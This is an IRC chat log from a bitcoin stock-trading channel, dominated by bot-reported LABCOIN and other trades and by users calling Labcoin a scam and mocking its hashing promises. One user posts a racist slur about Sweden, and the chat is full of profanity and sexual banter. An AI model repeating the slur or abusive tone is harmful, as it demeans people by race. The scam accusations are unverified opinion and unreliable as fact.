WAIT.... it's a ploy to sell memberships Aug 19 21:03:52 This will be the best membership drive they have, people buying just to vote n0 :( Aug 19 21:04:02 I would like to see a board with Josh Zerlan/Sonny from BFL, Mircea P/MPOE-PR, Ken from Active Miner and Luke-Jr on it just for the laughs Aug 19 21:04:05 Lol, yeah thinking about it Aug 19 21:04:17 [BTCTC] [LABCOIN] 2500 @ 0.002498 = 6.245 BTC [-] Aug 19 21:04:24 [BTCTC] [LABCOIN] 500 @ 0.002498 = 1.249 BTC [-] Aug 19 21:04:25 [BTCTC] [LABCOIN] 4790 @ 0.002499 = 11.9702 BTC [+] Aug 19 21:04:28 [BTCTC] [LABCOIN] 275 @ 0.0025 = 0.6875 BTC [+] Aug 19 21:04:30 [BTCTC] [LABCOIN] 5000 @ 0.0025 = 12.5 BTC [+] Aug 19 21:04:31 [BTCTC] [LABCOIN] 3461 @ 0.0025 = 8.6525 BTC [+] Aug 19 21:04:32 [BTCTC] [LABCOIN] 474 @ 0.0025 = 1.185 BTC [+] Aug 19 21:04:45 Well, Mircea does not deserve to be mentioned with some of those others Aug 19 21:04:54 or PR Aug 19 21:05:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.03706 = 0.0741 BTC [+] Aug 19 21:05:33 [BTCTC] [LABCOIN] 100 @ 0.0025 = 0.25 BTC [+] Aug 19 21:05:37 [BTCTC] [LABCOIN] 965 @ 0.0025 = 2.4125 BTC [+] Aug 19 21:05:38 [BTCTC] [LABCOIN] 13035 @ 0.0025 = 32.5875 BTC [+] Aug 19 21:05:41 [BTCTC] [ASICMINER-PT] 7 @ 3.69 = 25.83 BTC [-] Aug 19 21:06:19 [BTCTC] [LABCOIN] 60 @ 0.0025 = 0.15 BTC [+] Aug 19 21:06:20 [BTCTC] [ASICMINER-PT] 5 @ 3.68 = 18.4 BTC [-] Aug 19 21:07:15 [BTCTC] [LABCOIN] 25 @ 0.002497 = 0.0624 BTC [-] Aug 19 21:07:30 [BTCTC] [TAT.ASICMINER] 84 @ 0.0366 = 3.0744 BTC [-] Aug 19 21:07:57 [BTCTC] [LABCOIN] 5 @ 0.002499 = 0.0125 BTC [+] Aug 19 21:08:17 [BTCTC] [LABCOIN] 192 @ 0.002497 = 0.4794 BTC [-] Aug 19 21:10:38 [BTCTC] [LABCOIN] 29 @ 0.002497 = 0.0724 BTC [-] Aug 19 21:11:25 [BTCTC] [LABCOIN] 30 @ 0.002404 = 0.0721 BTC [-] Aug 19 21:11:38 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0011 = 0.0022 BTC [+] Aug 19 21:11:39 [BTCTC] [ASICMINER-PT] 1 @ 3.671 BTC [-] Aug 19 21:11:55 [BTCTC] [LTC-ATF.B2] 2 @ 0.01019 = 0.0204 BTC [-] Aug 19 21:12:57 [BTCTC] [LABCOIN] 85 @ 0.002406 = 0.2045 BTC [+] Aug 19 21:12:59 [BTCTC] [LABCOIN] 14 @ 0.002405 = 0.0337 BTC [-] Aug 19 21:13:00 [BTCTC] [LABCOIN] 30 @ 0.002402 = 0.0721 BTC [-] Aug 19 21:13:05 [BTCTC] [LABCOIN] 7 @ 0.002401 = 0.0168 BTC [-] Aug 19 21:13:07 [BTCTC] [LABCOIN] 10 @ 0.0024 = 0.024 BTC [-] Aug 19 21:13:08 [BTCTC] [LABCOIN] 36 @ 0.0024 = 0.0864 BTC [-] Aug 19 21:13:21 [BTCTC] [LABCOIN] 15 @ 0.002403 = 0.036 BTC [+] Aug 19 21:13:25 [BTCTC] [LABCOIN] 1 @ 0.002403 BTC [+] Aug 19 21:13:53 [BTCTC] [LABCOIN] 14 @ 0.0024 = 0.0336 BTC [-] Aug 19 21:14:22 [BTCTC] [LABCOIN] 50 @ 0.002402 = 0.1201 BTC [+] Aug 19 21:14:53 [BTCTC] [LABCOIN] 85 @ 0.002282 = 0.194 BTC [-] Aug 19 21:14:54 [BTCTC] [LABCOIN] 6 @ 0.002282 = 0.0137 BTC [-] Aug 19 21:16:59 [BTCTC] [LABCOIN] 424 @ 0.00237 = 1.0049 BTC [+] Aug 19 21:17:02 [BTCTC] [ACTIVEMINING] 6 @ 0.005106 = 0.0306 BTC [-] Aug 19 21:17:03 [BTCTC] [LABCOIN] 30 @ 0.002399 = 0.072 BTC [+] Aug 19 21:17:05 [BTCTC] [LABCOIN] 9000 @ 0.0024 = 21.6 BTC [+] Aug 19 21:17:06 [BTCTC] [ACTIVEMINING] 383 @ 0.005105 = 1.9552 BTC [-] Aug 19 21:17:07 [BTCTC] [LABCOIN] 520 @ 0.0024 = 1.248 BTC [+] Aug 19 21:17:08 [BTCTC] [ACTIVEMINING] 390 @ 0.005102 = 1.9898 BTC [-] Aug 19 21:17:09 [BTCTC] [LABCOIN] 100 @ 0.002405 = 0.2405 BTC [+] Aug 19 21:17:11 [BTCTC] [LABCOIN] 50 @ 0.002449 = 0.1225 BTC [+] Aug 19 21:17:12 [BTCTC] [LABCOIN] 1023 @ 0.00245 = 2.5064 BTC [+] Aug 19 21:17:12 [BTCTC] [LABCOIN] 1742 @ 0.002005 = 3.4927 BTC [-] Aug 19 21:17:13 [BTCTC] [LABCOIN] 217 @ 0.002004 = 0.4349 BTC [-] Aug 19 21:17:20 [BTCTC] [LABCOIN] 25 @ 0.002003 = 0.0501 BTC [-] Aug 19 21:17:34 [BTCTC] [BASIC-MINING] 1 @ 0.2777 BTC [+] Aug 19 21:17:35 [BTCTC] [BASIC-MINING] 3 @ 0.2776 = 0.8328 BTC [-] Aug 19 21:17:41 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.0011 = 0.0176 BTC [+] Aug 19 21:17:45 [BTCTC] [ASICMINER-PT] 1 @ 3.67 BTC [-] Aug 19 21:18:45 [BTCTC] [NASTY-PT] 100 @ 0.0033 = 0.33 BTC [-] Aug 19 21:19:26 [BTCTC] [LABCOIN] 30 @ 0.002362 = 0.0709 BTC [+] Aug 19 21:19:27 [BTCTC] [LABCOIN] 74 @ 0.002363 = 0.1749 BTC [+] Aug 19 21:19:57 [BTCTC] [COGNITIVE] 4 @ 0.3266 = 1.3064 BTC [+] Aug 19 21:20:31 [BTCTC] [LABCOIN] 15 @ 0.002365 = 0.0355 BTC [+] Aug 19 21:20:33 [BTCTC] [LABCOIN] 19 @ 0.002366 = 0.045 BTC [+] Aug 19 21:20:34 [BTCTC] [LABCOIN] 300 @ 0.002367 = 0.7101 BTC [+] Aug 19 21:21:26 wtf Aug 19 21:21:43 fuck this shit Aug 19 21:21:52 labcoin is a scam Aug 19 21:21:59 and everyone is buying it Aug 19 21:22:01 sellsellsell Aug 19 21:22:03 :P Aug 19 21:22:20 [BTCTC] [LABCOIN] 6 @ 0.002366 = 0.0142 BTC [-] Aug 19 21:22:23 [BTCTC] [LABCOIN] 18 @ 0.002367 = 0.0426 BTC [+] Aug 19 21:22:36 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.001198 = 0.012 BTC [+] Aug 19 21:23:05 [BTCTC] [DMS.MINING] 1 @ 0.0033 BTC [+] Aug 19 21:23:22 [BTCTC] [LABCOIN] 1 @ 0.002366 BTC [-] Aug 19 21:23:56 wtf is this shit Aug 19 21:24:04 [MPEX] [S.MPOE] 2900 @ 0.00084138 = 2.44 BTC [+] Aug 19 21:24:12 http://bcoinnews.com/2013/08/19/labcoin-updates-from-theswede75/ Aug 19 21:24:19 [BTCTC] [LABCOIN] 6 @ 0.002366 = 0.0142 BTC [-] Aug 19 21:24:20 [BTCTC] [LABCOIN] 97 @ 0.002367 = 0.2296 BTC [+] Aug 19 21:24:20 [BTCTC] [LABCOIN] 175 @ 0.002396 = 0.4193 BTC [+] Aug 19 21:24:21 [BTCTC] [LABCOIN] 1342 @ 0.002397 = 3.2168 BTC [+] Aug 19 21:24:31 [BTCTC] [BASIC-MINING] 1 @ 0.28 BTC [+] Aug 19 21:24:45 yesterday there was one "with a good feeling about labcoin news"... ;) Aug 19 21:24:53 "- The first run of chips will be built into miners immediately and Labcoin expects to be live and hashing @ around 6TH within the next 3-4 weeks." Aug 19 21:25:00 lol Aug 19 21:25:04 fuck me Aug 19 21:25:26 [BTCTC] [LABCOIN] 100 @ 0.002397 = 0.2397 BTC [+] Aug 19 21:25:30 "TLDR; Things are going as planned with no delays as of yet. Labcoin expects to hash at approx 6TH within 3-4 weeks and 50TH+ by mid to late October. Serial production run of chips will start early Sept. Pictures of chips, schematics and miners etc. will be posted as they become available. Website is undergoing redesign and will feature a real-time mining statistic as soon as the mining Aug 19 21:25:30 operation goes live. " Aug 19 21:25:44 fuck that shit Aug 19 21:25:53 six terahashes my ass Aug 19 21:25:59 it will not happen Aug 19 21:26:00 Your ass eh? Aug 19 21:26:07 don't believe them? Aug 19 21:26:12 nope Aug 19 21:26:24 [BTCTC] [LABCOIN] 18 @ 0.002396 = 0.0431 BTC [-] Aug 19 21:27:30 it's physically impossible Aug 19 21:27:40 where will they get the electricity? Aug 19 21:27:46 [BTCTC] [HOSTED-MINING] 1 @ 0.2799 BTC [-] Aug 19 21:27:56 not from fucking sweden that's fpr sure Aug 19 21:28:09 sweden has too many niggers to uphold Aug 19 21:28:24 I am now starting to think BFL will be the first to deliver 28 nm… Aug 19 21:28:30 [BTCTC] [BASIC-MINING] 8 @ 0.2776 = 2.2208 BTC [-] Aug 19 21:28:44 lol Aug 19 21:28:51 it'll be a cold day in hell before that happens pankkake lol Aug 19 21:28:58 [BTCTC] [BASIC-MINING] 1 @ 0.2754 BTC [-] Aug 19 21:28:58 The 10% fee transfer is such a slap in the face Aug 19 21:28:59 [BTCTC] [BASIC-MINING] 1 @ 0.275 BTC [-] Aug 19 21:29:00 [BTCTC] [BASIC-MINING] 17 @ 0.2723 = 4.6291 BTC [-] Aug 19 21:29:01 [BTCTC] [BASIC-MINING] 26 @ 0.2721 = 7.0746 BTC [-] Aug 19 21:29:07 they make a great point, they have the experience now Aug 19 21:29:18 [BTCTC] [LABCOIN] 140 @ 0.002394 = 0.3352 BTC [-] Aug 19 21:29:23 wtf is this shit Aug 19 21:29:36 and the others are clueless wanabees, or scammers (no difference in the point of customers or investors) Aug 19 21:29:46 "experience" assumes they learn, offering more pre-orders (this time without paypal) it tells us they haven't learned Aug 19 21:30:11 anyway, I ignore all labcoin news by default, because I ignore TheSwede75 the retard Aug 19 21:30:22 [BTCTC] [LABCOIN] 20 @ 0.002392 = 0.0478 BTC [-] Aug 19 21:30:43 [BTCTC] [ASICMINER-PT] 1 @ 3.67 BTC [-] Aug 19 21:30:59 of course by "first" I don't mean "on time" Aug 19 21:31:11 they'll fail, the others will fail more Aug 19 21:31:22 fucking labcoin coinlab scam Aug 19 21:31:33 i think bitfury and knc are legit Aug 19 21:31:33 jesus fucking shit Aug 19 21:31:58 why do we have to sufer this shit? Aug 19 21:32:04 [BTCTC] [ACTIVEMINING] 30 @ 0.005206 = 0.1562 BTC [+] Aug 19 21:32:07 why¨ Aug 19 21:32:15 is it because we are honest? Aug 19 21:32:18 prolly. Aug 19 21:32:27 no, because of TAKE ALL MY MONEY types Aug 19 21:32:46 [BTCTC] [ACTIVEMINING] 13 @ 0.005205 = 0.0677 BTC [-] Aug 19 21:32:51 [HAVELOCK] [LABCO] 87 @ 0.00189899 = 0.1652 BTC [+] Aug 19 21:32:55 shut up and take my money, I meant Aug 19 21:32:55 [HAVELOCK] [LABCO] 67 @ 0.00191998 = 0.1286 BTC [+] Aug 19 21:32:58 [HAVELOCK] [LABCO] 23 @ 0.001942 = 0.0447 BTC [+] Aug 19 21:33:02 [HAVELOCK] [LABCO] 267 @ 0.0022 = 0.5874 BTC [+] Aug 19 21:33:05 [HAVELOCK] [LABCO] 1356 @ 0.0022 = 2.9832 BTC [+] Aug 19 21:33:35 [MPEX] [S.MPOE] 1150 @ 0.00084138 = 0.9676 BTC [+] Aug 19 21:34:09 [HAVELOCK] [LABCO] 168 @ 0.0022 = 0.3696 BTC [+] Aug 19 21:34:12 fuck this fucking shit Aug 19 21:34:32 gecko_x8 so angry! Aug 19 21:34:34 [BTCTC] [LABCOIN] 4 @ 0.002355 = 0.0094 BTC [-] Aug 19 21:34:49 gecko_x8: relax? enjoy some lulz. jesus. Aug 19 21:35:01 jesus FUCKING CHRIST Aug 19 21:35:09 Well BFL I think (someone correct me that can remember more) fpga was off by 300% on power, Asic was off by 300% on power Aug 19 21:35:13 FUCK IT Aug 19 21:35:19 FUCK IT ALL Aug 19 21:35:28 [BTCTC] [LABCOIN] 4 @ 0.002369 = 0.0095 BTC [+] Aug 19 21:35:31 so, if they follow up you can not have a PCI-e that draws 900 w Aug 19 21:35:33 ;;slap gecko_x8 Aug 19 21:35:41 fuck you Aug 19 21:35:49 fuck this shit Aug 19 21:35:49 [BTCTC] [LABCOIN] 20 @ 0.002354 = 0.0471 BTC [-] Aug 19 21:35:50 [BTCTC] [LABCOIN] 10 @ 0.00235 = 0.0235 BTC [-] Aug 19 21:35:51 [BTCTC] [LABCOIN] 258 @ 0.002281 = 0.5885 BTC [-] Aug 19 21:35:52 [BTCTC] [LABCOIN] 70 @ 0.00228 = 0.1596 BTC [-] Aug 19 21:35:53 [BTCTC] [LABCOIN] 1642 @ 0.00228 = 3.7438 BTC [-] Aug 19 21:39:42 [BTCTC] [BASIC-MINING] 4 @ 0.2551 = 1.0204 BTC [-] Aug 19 21:40:15 fucking idiots buying labcoin Aug 19 21:40:18 coinlab Aug 19 21:40:22 terracoin Aug 19 21:40:25 cointerra Aug 19 21:40:30 isiots. Aug 19 21:40:35 idiots* Aug 19 21:40:39 I figured that was you selling yours just now.. no? Aug 19 21:40:48 nope Aug 19 21:40:55 sold out at 17 Aug 19 21:41:05 [BTCTC] [LABCOIN] 6 @ 0.002363 = 0.0142 BTC [+] Aug 19 21:41:06 [BTCTC] [LABCOIN] 32 @ 0.002363 = 0.0756 BTC [+] Aug 19 21:41:07 aha Aug 19 21:41:09 lol at even buying Aug 19 21:41:31 pankkake u got it Aug 19 21:41:45 this is a fucking scam Aug 19 21:41:51 [BTCTC] [LABCOIN] 38 @ 0.002362 = 0.0898 BTC [-] Aug 19 21:41:58 to the moon! Aug 19 21:42:00 from 17 to 23 on no news = scam Aug 19 21:42:04 HOLY JEESUS FUCK_O_RAMA THAT DIFFICULTY Aug 19 21:42:07 gecko_x8 simmer lol Aug 19 21:42:17 Expect there was news... Aug 19 21:42:25 .d Aug 19 21:42:25 50810339.04828 | Next Diff in 957 blocks | Estimated Change: 22.1535% in 5d 4h 5m 58s Aug 19 21:42:27 mp i'm fucking trying Aug 19 21:42:32 except* Aug 19 21:42:44 mp running out of alcohol atm.. very hard Aug 19 21:42:50 [BTCTC] [LABCOIN] 85 @ 0.002304 = 0.1958 BTC [-] Aug 19 21:42:50 [BTCTC] [LABCOIN] 1 @ 0.0023 BTC [-] Aug 19 21:42:52 [BTCTC] [LABCOIN] 2 @ 0.00229 = 0.0046 BTC [-] Aug 19 21:42:53 go play eve, blow up their sheeps. Aug 19 21:42:53 [BTCTC] [LABCOIN] 13 @ 0.002283 = 0.0297 BTC [-] Aug 19 21:43:18 sheeps full of sheeple? Aug 19 21:43:30 [BTCTC] [ACTIVEMINING] 30 @ 0.00519 = 0.1557 BTC [-] Aug 19 21:43:37 sheepeleeps sheepelaaaps Aug 19 21:43:41 hey i think i got something here. Aug 19 21:43:44 [BTCTC] [LABCOIN] 1 @ 0.002355 BTC [+] Aug 19 21:43:47 jcpham help me become a famous pop musician Aug 19 21:44:03 ok Aug 19 21:44:13 [BTCTC] [ACTIVEMINING] 200 @ 0.005188 = 1.0376 BTC [-] Aug 19 21:44:21 do i need to get new tits ? Aug 19 21:44:23 you need to sound horrible and ngaf Aug 19 21:44:30 check. Aug 19 21:44:31 and surround yourself with tits Aug 19 21:44:37 check! Aug 19 21:44:48 dude. maybe I AM a famous pop musician and i didn't even know. Aug 19 21:44:52 then get some cameras and video tape that shit and fix in the studio Aug 19 21:44:55 a Aug 19 21:44:57 with a bad ass editor and autotune Aug 19 21:45:03 [BTCTC] [LABCOIN] 1 @ 0.002355 BTC [+] Aug 19 21:45:04 [BTCTC] [LABCOIN] 18 @ 0.00232 = 0.0418 BTC [-] Aug 19 21:45:06 [BTCTC] [LABCOIN] 20 @ 0.002304 = 0.0461 BTC [-] Aug 19 21:45:06 youtube it Aug 19 21:45:07 [BTCTC] [LABCOIN] 1 @ 0.0023 BTC [-] Aug 19 21:45:08 [BTCTC] [LABCOIN] 27 @ 0.002283 = 0.0616 BTC [-] Aug 19 21:45:09 [BTCTC] [LABCOIN] 220 @ 0.002282 = 0.502 BTC [-] Aug 19 21:45:09 [BTCTC] [LABCOIN] 44 @ 0.002281 = 0.1004 BTC [-] Aug 19 21:45:11 [BTCTC] [LABCOIN] 358 @ 0.00228 = 0.8162 BTC [-] Aug 19 21:45:13 brb making ipo Aug 19 21:45:16 [BTCTC] [LABCOIN] 125 @ 0.002221 = 0.2776 BTC [-] Aug 19 21:45:21 [BTCTC] [LABCOIN] 1000 @ 0.00222 = 2.22 BTC [-] Aug 19 21:45:23 [BTCTC] [LABCOIN] 18 @ 0.002214 = 0.0399 BTC [-] Aug 19 21:45:25 [BTCTC] [LABCOIN] 146 @ 0.002213 = 0.3231 BTC [-] Aug 19 21:45:26 fucking crap Aug 19 21:45:30 [BTCTC] [LABCOIN] 15 @ 0.002211 = 0.0332 BTC [-] Aug 19 21:45:33 fuck lc Aug 19 21:45:36 [BTCTC] [LABCOIN] 125 @ 0.00221 = 0.2763 BTC [-] Aug 19 21:45:39 [BTCTC] [LABCOIN] 12 @ 0.002206 = 0.0265 BTC [-] Aug 19 21:45:41 [BTCTC] [LABCOIN] 100 @ 0.002205 = 0.2205 BTC [-] Aug 19 21:45:45 I'd invest Aug 19 21:45:46 [BTCTC] [LABCOIN] 252 @ 0.002202 = 0.5549 BTC [-] Aug 19 21:45:47 [BTCTC] [LABCOIN] 36 @ 0.002201 = 0.0792 BTC [-] Aug 19 21:45:55 pankkake you just want to see me with fake tits. Aug 19 21:46:05 ^ Aug 19 21:46:11 i like tits fake or not Aug 19 21:46:27 no I have faith in teenage girls falling for the misterious romanian pop star Aug 19 21:46:48 it worked for the germans with tokio hotels Aug 19 21:46:51 romanian pop star huh Aug 19 21:47:04 sing in romanian too Aug 19 21:47:07 lemme get my nine millimeter Aug 19 21:47:17 maybe i can set it all right Aug 19 21:47:32 [BTCTC] [LABCOIN] 85 @ 0.002219 = 0.1886 BTC [+] Aug 19 21:47:38 [BTCTC] [LABCOIN] 14 @ 0.002217 = 0.031 BTC [-] Aug 19 21:47:41 [BTCTC] [LABCOIN] 14 @ 0.002203 = 0.0308 BTC [-] Aug 19 21:47:42 [BTCTC] [LABCOIN] 148 @ 0.002202 = 0.3259 BTC [-] Aug 19 21:47:57 [BTCTC] [LABCOIN] 85 @ 0.002346 = 0.1994 BTC [+] Aug 19 21:48:11 [BTCTC] [LABCOIN] 1726 @ 0.002348 = 4.0526 BTC [+] Aug 19 21:48:27 so the scam is gonna get all the money here Aug 19 21:48:41 I've read fanfic of teenage fangirls. It's hardcore Aug 19 21:48:42 lc to da moon Aug 19 21:48:44 and the reasonable businesses will al get fucked Aug 19 21:48:46 i get it Aug 19 21:48:48 [BTCTC] [DMS.MINING] 102 @ 0.00329 = 0.3356 BTC [-] Aug 19 21:48:58 gecko_x8, I heard if you bitch and moan a lot it'll change reality. Try it out! Aug 19 21:49:08 haha Aug 19 21:49:25 kleeck wtf u think i'm trying to do? Aug 19 21:49:27 My last wife tried that, didn't work out for her Aug 19 21:49:34 [BTCTC] [LABCOIN] 1 @ 0.002348 BTC [+] Aug 19 21:49:47 gecko_x8: well you can just wait and say I told you so Aug 19 21:49:50 oh so now i should marry you Rulother? Aug 19 21:49:50 FYI: Rulother's ex-wife is dead. Aug 19 21:50:00 lol and no to both Aug 19 21:50:01 [BTCTC] [LABCOIN] 14 @ 0.002348 = 0.0329 BTC [+] Aug 19 21:50:13 Well last one hasn't been confirmed yet Aug 19 21:50:15 twist : kleeck is the dead wife. Aug 19 21:50:16 fuck this fucking shit Aug 19 21:50:22 [BTCTC] [LABCOIN] 174 @ 0.002348 = 0.4086 BTC [+] Aug 19 21:50:25 fuck it. Aug 19 21:50:29 and fuck it hard. Aug 19 21:50:36 such anger Aug 19 21:50:38 [BTCTC] [LABCOIN] 80 @ 0.002347 = 0.1878 BTC [-] Aug 19 21:50:45 gecko_x8, how many shares did you have? Aug 19 21:50:46 come on 0024, you can do it! Aug 19 21:50:47 gecko you're in the uk right Aug 19 21:50:51 jcpham help gecko_x8 become a famous heavy metal star. Aug 19 21:50:53 [BTCTC] [DMS.MINING] 1 @ 0.00329 BTC [-] Aug 19 21:50:58 :) Aug 19 21:51:04 [BTCTC] [HOSTED-MINING] 2 @ 0.28 = 0.56 BTC [+] Aug 19 21:51:12 no i'm going out on the balcony for a fucking smoke Aug 19 21:51:19 and i will forget all of you Aug 19 21:51:22 lol Aug 19 21:51:26 Good call. Aug 19 21:51:31 :) Aug 19 21:51:45 what happened Aug 19 21:51:49 a new troll? Aug 19 21:52:03 gecko_x8, what kinda smoke is that? Aug 19 21:52:05 gecko_x8, is pissed that he sold all his Labcoin shares before the bubble. Aug 19 21:52:05 [BTCTC] [ACTIVEMINING] 108 @ 0.005184 = 0.5599 BTC [-] Aug 19 21:52:17 labcoin is still relevant? Aug 19 21:52:18 Rulother i wish it was flower Aug 19 21:52:21 but it ain't Aug 19 21:52:29 because i'm poor and unwanted Aug 19 21:52:31 jcpham, yes. Aug 19 21:52:37 by a bunch of fucking jerks Aug 19 21:52:41 so i should have bought it after all? Aug 19 21:52:44 no Aug 19 21:52:54 mircea_popescu: thanks for getting me un-stuck :) Aug 19 21:53:07 :) Aug 19 21:53:42 [BTCTC] [TAT.VIRTUALMINE] 134 @ 0.0012 = 0.1608 BTC [+] Aug 19 21:53:44 [BTCTC] [LABCOIN] 30 @ 0.002257 = 0.0677 BTC [-] Aug 19 21:53:47 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.0012 = 0.18 BTC [+] Aug 19 21:53:48 [BTCTC] [LABCOIN] 55 @ 0.002256 = 0.1241 BTC [-] Aug 19 21:53:49 [BTCTC] [TAT.VIRTUALMINE] 155 @ 0.0012 = 0.186 BTC [+] Aug 19 21:53:59 [BTCTC] [LABCOIN] 30 @ 0.002258 = 0.0677 BTC [+] Aug 19 21:54:00 [BTCTC] [LABCOIN] 20 @ 0.002258 = 0.0452 BTC [+] Aug 19 21:54:02 [BTCTC] [LABCOIN] 30 @ 0.002255 = 0.0677 BTC [-] Aug 19 21:54:03 [BTCTC] [LABCOIN] 14 @ 0.002254 = 0.0316 BTC [-] Aug 19 21:54:03 [BTCTC] [LABCOIN] 989 @ 0.002254 = 2.2292 BTC [-] Aug 19 21:54:45 [MPEX] [S.MPOE] 1450 @ 0.00084138 = 1.22 BTC [+] Aug 19 21:54:47 [BTCTC] [TAT.VIRTUALMINE] 41 @ 0.001279 = 0.0524 BTC [+] Aug 19 21:54:48 [MPEX] [S.MPOE] 3201 @ 0.00084163 = 2.6941 BTC [+] Aug 19 21:55:03 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.001389 = 0.0417 BTC [+] Aug 19 21:55:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0014 BTC [+] Aug 19 21:55:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00141 BTC [+] Aug 19 21:56:05 [BTCTC] [LABCOIN] 30 @ 0.002255 = 0.0677 BTC [+] Aug 19 21:56:07 [BTCTC] [LABCOIN] 11 @ 0.002254 = 0.0248 BTC [-] Aug 19 21:56:08 [BTCTC] [LABCOIN] 1 @ 0.00225 BTC [-] Aug 19 21:56:08 No, real businesses won't get fucked because they'll keep around. What will happen is this: Aug 19 21:56:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00145 BTC [+] Aug 19 21:56:29 Scammers get lots of BTC all the time. Those BTC gets sold and return in the economy Aug 19 21:56:52 While that happens, legit business make money slowly and some people accumulate a BTC fortune. Aug 19 21:56:52 sorta like mining Aug 19 21:56:58 except they mine in the dirt. Aug 19 21:56:58 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.001489 = 0.0298 BTC [+] Aug 19 21:56:59 [BTCTC] [LABCOIN] 30 @ 0.002255 = 0.0677 BTC [+] Aug 19 21:57:22 Eventually some are rich, some have lost their coins. Aug 19 21:58:47 stfu Aug 19 22:00:18 [BTCTC] [LABCOIN] 125 @ 0.002205 = 0.2756 BTC [-] Aug 19 22:00:20 [BTCTC] [LABCOIN] 265 @ 0.002203 = 0.5838 BTC [-] Aug 19 22:00:21 [BTCTC] [LABCOIN] 2 @ 0.002203 = 0.0044 BTC [-] Aug 19 22:00:23 [BTCTC] [LABCOIN] 1964 @ 0.002201 = 4.3228 BTC [-] Aug 19 22:00:24 [BTCTC] [LABCOIN] 1 @ 0.002201 BTC [-] Aug 19 22:00:25 [BTCTC] [LABCOIN] 2000 @ 0.002166 = 4.332 BTC [-] Aug 19 22:00:26 [BTCTC] [LABCOIN] 375 @ 0.002152 = 0.807 BTC [-] Aug 19 22:00:27 [BTCTC] [LABCOIN] 3000 @ 0.002151 = 6.453 BTC [-] Aug 19 22:00:39 [BTCTC] [LABCOIN] 30 @ 0.002151 = 0.0645 BTC [-] Aug 19 22:03:59 [BTCTC] [LABCOIN] 30 @ 0.002217 = 0.0665 BTC [+] Aug 19 22:03:59 [BTCTC] [LABCOIN] 55 @ 0.002218 = 0.122 BTC [+] Aug 19 22:04:41 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.001489 = 0.0268 BTC [+] Aug 19 22:06:58 [BTCTC] [LABCOIN] 30 @ 0.002195 = 0.0659 BTC [-] Aug 19 22:06:59 [BTCTC] [LABCOIN] 85 @ 0.002196 = 0.1867 BTC [+] Aug 19 22:07:00 [BTCTC] [LABCOIN] 129 @ 0.002198 = 0.2835 BTC [+] Aug 19 22:07:01 [BTCTC] [LABCOIN] 2756 @ 0.0022 = 6.0632 BTC [+] Aug 19 22:07:04 [HAVELOCK] [XBOND] 515 @ 0.0011789 = 0.6071 BTC [+] Aug 19 22:07:20 [HAVELOCK] [XBOND] 2 @ 0.0011789 = 0.0024 BTC [+] Aug 19 22:08:50 [HAVELOCK] [XBOND] 20 @ 0.0011789 = 0.0236 BTC [+] Aug 19 22:09:31 [HAVELOCK] [XBOND] 3 @ 0.0011789 = 0.0035 BTC [+] Aug 19 22:09:41 [BTCTC] [LABCOIN] 30 @ 0.002193 = 0.0658 BTC [-] Aug 19 22:09:43 [BTCTC] [LABCOIN] 2 @ 0.002194 = 0.0044 BTC [+] Aug 19 22:09:43 [BTCTC] [LABCOIN] 20 @ 0.002196 = 0.0439 BTC [+] Aug 19 22:09:44 [BTCTC] [LABCOIN] 10 @ 0.002199 = 0.022 BTC [+] Aug 19 22:09:45 [BTCTC] [LABCOIN] 244 @ 0.0022 = 0.5368 BTC [+] Aug 19 22:09:56 [BTCTC] [LABCOIN] 30 @ 0.0022 = 0.066 BTC [+] Aug 19 22:10:23 [BTCTC] [ASICMINER-PT] 1 @ 3.68 BTC [+] Aug 19 22:11:04 Isn't there supposed to be am news this week too? Aug 19 22:11:18 [BTCTC] [LABCOIN] 30 @ 0.002256 = 0.0677 BTC [+] Aug 19 22:11:19 [BTCTC] [BITVPS] 240 @ 0.002403 = 0.5767 BTC [+] Aug 19 22:11:20 [BTCTC] [LABCOIN] 1 @ 0.002257 BTC [+] Aug 19 22:11:22 [BTCTC] [BITVPS] 200 @ 0.002402 = 0.4804 BTC [-] Aug 19 22:11:34 as long as it's nothing about anything verifiable yeah, there's supposed to be news lol Aug 19 22:11:49 So the usual Aug 19 22:11:52 [BTCTC] [LABCOIN] 30 @ 0.002255 = 0.0677 BTC [-] Aug 19 22:11:54 Isn't there supposed to be am news this week too? < Yes on Saturday they said this next Saturday Aug 19 22:11:58 IIRC Aug 19 22:12:03 lol Aug 19 22:12:58 Mircea did you see who was running for election Aug 19 22:13:19 [MPEX] [S.MPOE] 7700 @ 0.00084084 = 6.4745 BTC [-] Aug 19 22:14:06 [HAVELOCK] [XBOND] 49 @ 0.0011789 = 0.0578 BTC [+] Aug 19 22:14:08 from 17 to 23 on no news = scam << what would you consider as "news", if not an announcement (legit or not)? Aug 19 22:19:20 [BTCTC] [DMS.SELLING] 6 @ 0.01735 = 0.1041 BTC [-] Aug 19 22:19:21 [BTCTC] [DMS.SELLING] 12 @ 0.01735 = 0.2082 BTC [-] Aug 19 22:20:35 [BTCTC] [LABCOIN] 14 @ 0.002259 = 0.0316 BTC [+] Aug 19 22:20:36 [BTCTC] [LABCOIN] 36 @ 0.00226 = 0.0814 BTC [+] Aug 19 22:21:52 .d Aug 19 22:21:54 50810339.04828 | Next Diff in 951 blocks | Estimated Change: 22.3737% in 5d 2h 52m 17s Aug 19 22:22:41 [BTCTC] [LABCOIN] 12 @ 0.002259 = 0.0271 BTC [-] Aug 19 22:22:42 [BTCTC] [LABCOIN] 202 @ 0.00226 = 0.4565 BTC [+] Aug 19 22:22:43 [BTCTC] [LABCOIN] 1 @ 0.00231 BTC [+] Aug 19 22:22:44 [BTCTC] [LABCOIN] 25 @ 0.002319 = 0.058 BTC [+] Aug 19 22:22:46 [BTCTC] [LABCOIN] 190 @ 0.00232 = 0.4408 BTC [+] Aug 19 22:24:37 [BTCTC] [BFMINES] 2 @ 0.00175 = 0.0035 BTC [+] Aug 19 22:24:59 [BTCTC] [LABCOIN] 3 @ 0.002318 = 0.007 BTC [-] Aug 19 22:25:00 [BTCTC] [LABCOIN] 20 @ 0.002319 = 0.0464 BTC [+] Aug 19 22:25:00 [BTCTC] [LABCOIN] 10 @ 0.00232 = 0.0232 BTC [+] Aug 19 22:25:15 